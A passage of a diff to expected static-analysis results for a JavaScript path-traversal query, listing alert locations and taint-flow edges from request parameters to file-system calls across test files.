| req.query.path | normalizedPaths.js:332:19:332:32 | normalizedPath | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | +| normalizedPaths.js:341:18:341:21 | path | normalizedPaths.js:339:32:339:45 | req.query.path | normalizedPaths.js:341:18:341:21 | path | This path depends on a $@. | normalizedPaths.js:339:32:339:45 | req.query.path | user-provided value | +| normalizedPaths.js:346:19:346:22 | path | normalizedPaths.js:339:32:339:45 | req.query.path | normalizedPaths.js:346:19:346:22 | path | This path depends on a $@. | normalizedPaths.js:339:32:339:45 | req.query.path | user-provided value | +| normalizedPaths.js:356:19:356:22 | path | normalizedPaths.js:354:14:354:27 | req.query.path | normalizedPaths.js:356:19:356:22 | path | This path depends on a $@. | normalizedPaths.js:354:14:354:27 | req.query.path | user-provided value | +| normalizedPaths.js:363:21:363:31 | requestPath | normalizedPaths.js:354:14:354:27 | req.query.path | normalizedPaths.js:363:21:363:31 | requestPath | This path depends on a $@. | normalizedPaths.js:354:14:354:27 | req.query.path | user-provided value | +| normalizedPaths.js:379:19:379:22 | path | normalizedPaths.js:377:14:377:27 | req.query.path | normalizedPaths.js:379:19:379:22 | path | This path depends on a $@. | normalizedPaths.js:377:14:377:27 | req.query.path | user-provided value | +| normalizedPaths.js:381:19:381:29 | slash(path) | normalizedPaths.js:377:14:377:27 | req.query.path | normalizedPaths.js:381:19:381:29 | slash(path) | This path depends on a $@. | normalizedPaths.js:377:14:377:27 | req.query.path | user-provided value | +| normalizedPaths.js:388:19:388:22 | path | normalizedPaths.js:385:35:385:45 | req.query.x | normalizedPaths.js:388:19:388:22 | path | This path depends on a $@. | normalizedPaths.js:385:35:385:45 | req.query.x | user-provided value | +| normalizedPaths.js:399:21:399:24 | path | normalizedPaths.js:385:35:385:45 | req.query.x | normalizedPaths.js:399:21:399:24 | path | This path depends on a $@. | normalizedPaths.js:385:35:385:45 | req.query.x | user-provided value | +| normalizedPaths.js:407:19:407:67 | pathMod ... t('/')) | normalizedPaths.js:407:45:407:55 | req.query.x | normalizedPaths.js:407:19:407:67 | pathMod ... t('/')) | This path depends on a $@. | normalizedPaths.js:407:45:407:55 | req.query.x | user-provided value | +| normalizedPaths.js:408:19:408:60 | pathMod ... t('/')) | normalizedPaths.js:408:38:408:48 | req.query.x | normalizedPaths.js:408:19:408:60 | pathMod ... t('/')) | This path depends on a $@. | normalizedPaths.js:408:38:408:48 | req.query.x | user-provided value | +| normalizedPaths.js:415:19:415:22 | path | normalizedPaths.js:412:35:412:45 | req.query.x | normalizedPaths.js:415:19:415:22 | path | This path depends on a $@. | normalizedPaths.js:412:35:412:45 | req.query.x | user-provided value | +| normalizedPaths.js:426:21:426:24 | path | normalizedPaths.js:412:35:412:45 | req.query.x | normalizedPaths.js:426:21:426:24 | path | This path depends on a $@. | normalizedPaths.js:412:35:412:45 | req.query.x | user-provided value | +| other-fs-libraries.js:11:19:11:22 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:11:19:11:22 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | +| other-fs-libraries.js:12:27:12:30 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:12:27:12:30 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | +| other-fs-libraries.js:13:24:13:27 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:13:24:13:27 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | +| other-fs-libraries.js:14:27:14:30 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:14:27:14:30 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | +| other-fs-libraries.js:16:34:16:37 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:16:34:16:37 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | +| other-fs-libraries.js:17:35:17:38 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:17:35:17:38 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | +| other-fs-libraries.js:19:56:19:59 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:19:56:19:59 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | +| other-fs-libraries.js:24:35:24:38 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:24:35:24:38 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | +| other-fs-libraries.js:40:35:40:38 | path | other-fs-libraries.js:38:24:38:30 | req.url | other-fs-libraries.js:40:35:40:38 | path | This path depends on a $@. | other-fs-libraries.js:38:24:38:30 | req.url | user-provided value | +| other-fs-libraries.js:41:50:41:53 | path | other-fs-libraries.js:38:24:38:30 | req.url | other-fs-libraries.js:41:50:41:53 | path | This path depends on a $@. | other-fs-libraries.js:38:24:38:30 | req.url | user-provided value | +| other-fs-libraries.js:42:53:42:56 | path | other-fs-libraries.js:38:24:38:30 | req.url | other-fs-libraries.js:42:53:42:56 | path | This path depends on a $@. | other-fs-libraries.js:38:24:38:30 | req.url | user-provided value | +| other-fs-libraries.js:51:19:51:22 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:51:19:51:22 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | +| other-fs-libraries.js:52:24:52:27 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:52:24:52:27 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | +| other-fs-libraries.js:54:36:54:39 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:54:36:54:39 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | +| other-fs-libraries.js:55:36:55:39 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:55:36:55:39 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | +| other-fs-libraries.js:57:46:57:49 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:57:46:57:49 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | +| other-fs-libraries.js:59:39:59:42 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:59:39:59:42 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | +| other-fs-libraries.js:62:43:62:46 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:62:43:62:46 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | +| other-fs-libraries.js:63:51:63:54 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:63:51:63:54 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | +| other-fs-libraries.js:70:19:70:22 | path | other-fs-libraries.js:68:24:68:30 | req.url | other-fs-libraries.js:70:19:70:22 | path | This path depends on a $@. | other-fs-libraries.js:68:24:68:30 | req.url | user-provided value | +| other-fs-libraries.js:71:10:71:13 | path | other-fs-libraries.js:68:24:68:30 | req.url | other-fs-libraries.js:71:10:71:13 | path | This path depends on a $@. | other-fs-libraries.js:68:24:68:30 | req.url | user-provided value | +| other-fs-libraries.js:72:15:72:18 | path | other-fs-libraries.js:68:24:68:30 | req.url | other-fs-libraries.js:72:15:72:18 | path | This path depends on a $@. | other-fs-libraries.js:68:24:68:30 | req.url | user-provided value | +| other-fs-libraries.js:76:19:76:19 | x | other-fs-libraries.js:68:24:68:30 | req.url | other-fs-libraries.js:76:19:76:19 | x | This path depends on a $@. | other-fs-libraries.js:68:24:68:30 | req.url | user-provided value | +| other-fs-libraries.js:83:16:83:19 | path | other-fs-libraries.js:81:24:81:30 | req.url | other-fs-libraries.js:83:16:83:19 | path | This path depends on a $@. | other-fs-libraries.js:81:24:81:30 | req.url | user-provided value | +| prettier.js:7:28:7:28 | p | prettier.js:6:13:6:13 | p | prettier.js:7:28:7:28 | p | This path depends on a $@. | prettier.js:6:13:6:13 | p | user-provided value | +| prettier.js:11:44:11:44 | p | prettier.js:6:13:6:13 | p | prettier.js:11:44:11:44 | p | This path depends on a $@. | prettier.js:6:13:6:13 | p | user-provided value | +| pupeteer.js:9:28:9:34 | tainted | pupeteer.js:5:28:5:53 | parseTo ... t).name | pupeteer.js:9:28:9:34 | tainted | This path depends on a $@. | pupeteer.js:5:28:5:53 | parseTo ... t).name | user-provided value | +| pupeteer.js:13:37:13:43 | tainted | pupeteer.js:5:28:5:53 | parseTo ... t).name | pupeteer.js:13:37:13:43 | tainted | This path depends on a $@. | pupeteer.js:5:28:5:53 | parseTo ... t).name | user-provided value | +| sharedlib-repro.js:22:18:22:25 | filepath | sharedlib-repro.js:13:22:13:43 | req.par ... spaceId | sharedlib-repro.js:22:18:22:25 | filepath | This path depends on a $@. | sharedlib-repro.js:13:22:13:43 | req.par ... spaceId | user-provided value | +| tainted-access-paths.js:8:19:8:22 | path | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:8:19:8:22 | path | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | +| tainted-access-paths.js:12:19:12:25 | obj.sub | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:12:19:12:25 | obj.sub | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | +| tainted-access-paths.js:26:19:26:26 | obj.sub3 | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:26:19:26:26 | obj.sub3 | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | +| tainted-access-paths.js:29:21:29:28 | obj.sub4 | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:29:21:29:28 | obj.sub4 | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | +| tainted-access-paths.js:30:23:30:30 | obj.sub4 | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:30:23:30:30 | obj.sub4 | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | +| tainted-access-paths.js:31:23:31:30 | obj.sub4 | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:31:23:31:30 | obj.sub4 | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | +| tainted-access-paths.js:40:23:40:26 | path | tainted-access-paths.js:39:24:39:30 | req.url | tainted-access-paths.js:40:23:40:26 | path | This path depends on a $@. | tainted-access-paths.js:39:24:39:30 | req.url | user-provided value | +| tainted-access-paths.js:49:10:49:13 | path | tainted-access-paths.js:48:24:48:30 | req.url | tainted-access-paths.js:49:10:49:13 | path | This path depends on a $@. | tainted-access-paths.js:48:24:48:30 | req.url | user-provided value | +| tainted-promise-steps.js:11:19:11:35 | await pathPromise | tainted-promise-steps.js:6:24:6:30 | req.url | tainted-promise-steps.js:11:19:11:35 | await pathPromise | This path depends on a $@. | tainted-promise-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-promise-steps.js:12:44:12:47 | path | tainted-promise-steps.js:6:24:6:30 | req.url | tainted-promise-steps.js:12:44:12:47 | path | This path depends on a $@. | tainted-promise-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-require.js:6:19:6:37 | req.param("module") | tainted-require.js:6:19:6:37 | req.param("module") | tainted-require.js:6:19:6:37 | req.param("module") | This path depends on a $@. | tainted-require.js:6:19:6:37 | req.param("module") | user-provided value | +| tainted-require.js:11:29:11:47 | req.param("module") | tainted-require.js:11:29:11:47 | req.param("module") | tainted-require.js:11:29:11:47 | req.param("module") | This path depends on a $@. | tainted-require.js:11:29:11:47 | req.param("module") | user-provided value | +| tainted-require.js:13:11:13:29 | req.param("module") | tainted-require.js:13:11:13:29 | req.param("module") | tainted-require.js:13:11:13:29 | req.param("module") | This path depends on a $@. | tainted-require.js:13:11:13:29 | req.param("module") | user-provided value | +| tainted-sendFile.js:7:16:7:33 | req.param("gimme") | tainted-sendFile.js:7:16:7:33 | req.param("gimme") | tainted-sendFile.js:7:16:7:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:7:16:7:33 | req.param("gimme") | user-provided value | +| tainted-sendFile.js:8:16:8:33 | req.param("gimme") | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | user-provided value | +| tainted-sendFile.js:15:43:15:58 | req.param("dir") | tainted-sendFile.js:15:43:15:58 | req.param("dir") | tainted-sendFile.js:15:43:15:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:15:43:15:58 | req.param("dir") | user-provided value | +| tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | tainted-sendFile.js:21:37:21:48 | req.params.x | tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | This path depends on a $@. | tainted-sendFile.js:21:37:21:48 | req.params.x | user-provided value | +| tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | tainted-sendFile.js:22:34:22:45 | req.params.x | tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:22:34:22:45 | req.params.x | user-provided value | +| tainted-sendFile.js:26:16:26:33 | req.param("gimme") | tainted-sendFile.js:26:16:26:33 | req.param("gimme") | tainted-sendFile.js:26:16:26:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:26:16:26:33 | req.param("gimme") | user-provided value | +| tainted-sendFile.js:28:16:28:48 | homeDir ... arams.x | tainted-sendFile.js:28:37:28:48 | req.params.x | tainted-sendFile.js:28:16:28:48 | homeDir ... arams.x | This path depends on a $@. | tainted-sendFile.js:28:37:28:48 | req.params.x | user-provided value | +| tainted-sendFile.js:30:16:30:46 | path.jo ... rams.x) | tainted-sendFile.js:30:34:30:45 | req.params.x | tainted-sendFile.js:30:16:30:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:30:34:30:45 | req.params.x | user-provided value | +| tainted-sendFile.js:32:43:32:58 | req.param("dir") | tainted-sendFile.js:32:43:32:58 | req.param("dir") | tainted-sendFile.js:32:43:32:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:32:43:32:58 | req.param("dir") | user-provided value | +| tainted-string-steps.js:8:18:8:34 | path.substring(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:8:18:8:34 | path.substring(4) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:10:18:10:31 | path.substr(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:10:18:10:31 | path.substr(4) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:11:18:11:30 | path.slice(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:11:18:11:30 | path.slice(4) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:13:18:13:37 | path.concat(unknown) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:13:18:13:37 | path.concat(unknown) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:14:18:14:37 | unknown.concat(path) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:14:18:14:37 | unknown.concat(path) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:15:18:15:46 | unknown ... , path) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:15:18:15:46 | unknown ... , path) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:17:18:17:28 | path.trim() | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:17:18:17:28 | path.trim() | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:18:18:18:35 | path.toLowerCase() | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:18:18:18:35 | path.toLowerCase() | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:22:18:22:35 | path.split('/')[i] | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:22:18:22:35 | path.split('/')[i] | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:23:18:23:36 | path.split(/\\//)[i] | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:23:18:23:36 | path.split(/\\//)[i] | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:24:18:24:35 | path.split("?")[0] | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:24:18:24:35 | path.split("?")[0] | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:27:18:27:36 | path.split(unknown) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:27:18:27:36 | path.split(unknown) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| torrents.js:7:25:7:27 | loc | torrents.js:5:13:5:38 | parseTo ... t).name | torrents.js:7:25:7:27 | loc | This path depends on a $@. | torrents.js:5:13:5:38 | parseTo ... t).name | user-provided value | +| typescript.ts:11:29:11:32 | path | typescript.ts:9:24:9:30 | req.url | typescript.ts:11:29:11:32 | path | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | +| typescript.ts:20:39:20:43 | path3 | typescript.ts:9:24:9:30 | req.url | typescript.ts:20:39:20:43 | path3 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | +| typescript.ts:23:39:23:43 | path4 | typescript.ts:9:24:9:30 | req.url | typescript.ts:23:39:23:43 | path4 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | +| typescript.ts:31:29:31:33 | path6 | typescript.ts:9:24:9:30 | req.url | typescript.ts:31:29:31:33 | path6 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | +| views.js:1:43:1:55 | req.params[0] | views.js:1:43:1:55 | req.params[0] | views.js:1:43:1:55 | req.params[0] | This path depends on a $@. | views.js:1:43:1:55 | req.params[0] | user-provided value | edges -| TaintedPath-es6.js:7:7:7:44 | path | TaintedPath-es6.js:10:41:10:44 | path | provenance | | +| TaintedPath-es6.js:7:7:7:44 | path | TaintedPath-es6.js:9:41:9:44 | path | provenance | | | TaintedPath-es6.js:7:14:7:33 | parse(req.url, true) | TaintedPath-es6.js:7:14:7:39 | parse(r ... ).query | provenance | Config | | TaintedPath-es6.js:7:14:7:39 | parse(r ... ).query | TaintedPath-es6.js:7:14:7:44 | parse(r ... ry.path | provenance | Config | | TaintedPath-es6.js:7:14:7:44 | parse(r ... ry.path | TaintedPath-es6.js:7:7:7:44 | path | provenance | | | TaintedPath-es6.js:7:20:7:26 | req.url | TaintedPath-es6.js:7:14:7:33 | parse(req.url, true) | provenance | Config | -| TaintedPath-es6.js:10:41:10:44 | path | TaintedPath-es6.js:10:26:10:45 | join("public", path) | provenance | Config | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:12:29:12:32 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:15:45:15:48 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:18:33:18:36 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:21:33:21:36 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:24:33:24:36 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:33:31:33:34 | path | provenance | | +| TaintedPath-es6.js:9:41:9:44 | path | TaintedPath-es6.js:9:26:9:45 | join("public", path) | provenance | Config | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:11:29:11:32 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:13:45:13:48 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:16:33:16:36 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:19:33:19:36 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:22:33:22:36 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:31:31:31:34 | path | provenance | | | TaintedPath.js:9:14:9:37 | url.par ... , true) | TaintedPath.js:9:14:9:43 | url.par ... ).query | provenance | Config | | TaintedPath.js:9:14:9:43 | url.par ... ).query | TaintedPath.js:9:14:9:48 | url.par ... ry.path | provenance | Config | | TaintedPath.js:9:14:9:48 | url.par ... ry.path | TaintedPath.js:9:7:9:48 | path | provenance | | | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:9:14:9:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:15:45:15:48 | path | TaintedPath.js:15:29:15:48 | "/home/user/" + path | provenance | Config | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:42:48:42:51 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:46:45:46:48 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:48:51:48:54 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:50:50:50:53 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:52:52:52:55 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:54:49:54:52 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:56:48:56:51 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:58:54:58:57 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:60:57:60:60 | path | provenance | | -| TaintedPath.js:38:10:38:33 | url.par ... , true) | TaintedPath.js:38:10:38:39 | url.par ... ).query | provenance | Config | -| TaintedPath.js:38:10:38:39 | url.par ... ).query | TaintedPath.js:38:10:38:44 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:38:10:38:44 | url.par ... ry.path | TaintedPath.js:38:3:38:44 | path | provenance | | -| TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:38:10:38:33 | url.par ... , true) | provenance | Config | -| TaintedPath.js:42:48:42:51 | path | TaintedPath.js:42:29:42:52 | pathMod ... e(path) | provenance | Config | -| TaintedPath.js:46:45:46:48 | path | TaintedPath.js:46:29:46:49 | pathMod ... n(path) | provenance | Config | -| TaintedPath.js:48:51:48:54 | path | TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | provenance | Config | -| TaintedPath.js:50:50:50:53 | path | TaintedPath.js:50:29:50:54 | pathMod ... e(path) | provenance | Config | -| TaintedPath.js:52:52:52:55 | path | TaintedPath.js:52:29:52:56 | pathMod ... , path) | provenance | Config | -| TaintedPath.js:54:49:54:52 | path | TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | provenance | Config | -| TaintedPath.js:56:48:56:51 | path | TaintedPath.js:56:29:56:52 | pathMod ... e(path) | provenance | Config | -| TaintedPath.js:58:54:58:57 | path | TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | provenance | Config | -| TaintedPath.js:60:57:60:60 | path | TaintedPath.js:60:29:60:61 | pathMod ... h(path) | provenance | Config | -| TaintedPath.js:65:31:65:70 | require ... eq.url) | TaintedPath.js:65:31:65:76 | require ... ).query | provenance | Config | -| TaintedPath.js:65:63:65:69 | req.url | TaintedPath.js:65:31:65:70 | require ... eq.url) | provenance | Config | -| TaintedPath.js:66:31:66:68 | require ... eq.url) | TaintedPath.js:66:31:66:74 | require ... ).query | provenance | Config | -| TaintedPath.js:66:61:66:67 | req.url | TaintedPath.js:66:31:66:68 | require ... eq.url) | provenance | Config | -| TaintedPath.js:67:31:67:67 | require ... eq.url) | TaintedPath.js:67:31:67:73 | require ... ).query | provenance | Config | -| TaintedPath.js:67:60:67:66 | req.url | TaintedPath.js:67:31:67:67 | require ... eq.url) | provenance | Config | -| TaintedPath.js:84:6:84:47 | path | TaintedPath.js:86:44:86:47 | path | provenance | | -| TaintedPath.js:84:6:84:47 | path | TaintedPath.js:87:14:87:17 | path | provenance | | -| TaintedPath.js:84:13:84:36 | url.par ... , true) | TaintedPath.js:84:13:84:42 | url.par ... ).query | provenance | Config | -| TaintedPath.js:84:13:84:42 | url.par ... ).query | TaintedPath.js:84:13:84:47 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:84:13:84:47 | url.par ... ry.path | TaintedPath.js:84:6:84:47 | path | provenance | | -| TaintedPath.js:84:23:84:29 | req.url | TaintedPath.js:84:13:84:36 | url.par ... , true) | provenance | Config | -| TaintedPath.js:86:44:86:47 | path | TaintedPath.js:86:28:86:48 | fs.real ... c(path) | provenance | Config | -| TaintedPath.js:87:14:87:17 | path | TaintedPath.js:88:32:88:39 | realpath | provenance | Config | -| TaintedPath.js:88:32:88:39 | realpath | TaintedPath.js:89:45:89:52 | realpath | provenance | | -| TaintedPath.js:120:6:120:47 | path | TaintedPath.js:122:23:122:26 | path | provenance | | -| TaintedPath.js:120:13:120:36 | url.par ... , true) | TaintedPath.js:120:13:120:42 | url.par ... ).query | provenance | Config | -| TaintedPath.js:120:13:120:42 | url.par ... ).query | TaintedPath.js:120:13:120:47 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:120:13:120:47 | url.par ... ry.path | TaintedPath.js:120:6:120:47 | path | provenance | | -| TaintedPath.js:120:23:120:29 | req.url | TaintedPath.js:120:13:120:36 | url.par ... , true) | provenance | Config | -| TaintedPath.js:126:7:126:48 | path | TaintedPath.js:128:19:128:22 | path | provenance | | -| TaintedPath.js:126:7:126:48 | path | TaintedPath.js:130:15:130:18 | path | provenance | | -| TaintedPath.js:126:14:126:37 | url.par ... , true) | TaintedPath.js:126:14:126:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:126:14:126:43 | url.par ... ).query | TaintedPath.js:126:14:126:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:126:14:126:48 | url.par ... ry.path | TaintedPath.js:126:7:126:48 | path | provenance | | -| TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:126:14:126:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:132:19:132:23 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:136:19:136:23 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:137:28:137:32 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:139:33:139:37 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:142:20:142:24 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:145:19:145:23 | split | provenance | | -| TaintedPath.js:130:15:130:18 | path | TaintedPath.js:130:15:130:29 | path.split("/") | provenance | Config | -| TaintedPath.js:130:15:130:29 | path.split("/") | TaintedPath.js:130:7:130:29 | split | provenance | | -| TaintedPath.js:132:19:132:23 | split | TaintedPath.js:132:19:132:33 | split.join("/") | provenance | Config | -| TaintedPath.js:136:19:136:23 | split | TaintedPath.js:136:19:136:26 | split[x] | provenance | Config | -| TaintedPath.js:137:28:137:32 | split | TaintedPath.js:137:28:137:35 | split[x] | provenance | Config | -| TaintedPath.js:137:28:137:35 | split[x] | TaintedPath.js:137:19:137:35 | prefix + split[x] | provenance | Config | -| TaintedPath.js:139:7:139:38 | concatted | TaintedPath.js:140:19:140:27 | concatted | provenance | | -| TaintedPath.js:139:19:139:38 | prefix.concat(split) | TaintedPath.js:139:7:139:38 | concatted | provenance | | -| TaintedPath.js:139:33:139:37 | split | TaintedPath.js:139:19:139:38 | prefix.concat(split) | provenance | Config | -| TaintedPath.js:140:19:140:27 | concatted | TaintedPath.js:140:19:140:37 | concatted.join("/") | provenance | Config | -| TaintedPath.js:142:7:142:39 | concatted2 | TaintedPath.js:143:19:143:28 | concatted2 | provenance | | -| TaintedPath.js:142:20:142:24 | split | TaintedPath.js:142:20:142:39 | split.concat(prefix) | provenance | Config | -| TaintedPath.js:142:20:142:39 | split.concat(prefix) | TaintedPath.js:142:7:142:39 | concatted2 | provenance | | -| TaintedPath.js:143:19:143:28 | concatted2 | TaintedPath.js:143:19:143:38 | concatted2.join("/") | provenance | Config | -| TaintedPath.js:145:19:145:23 | split | TaintedPath.js:145:19:145:29 | split.pop() | provenance | Config | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:154:29:154:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:160:29:160:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:161:29:161:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:162:29:162:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | 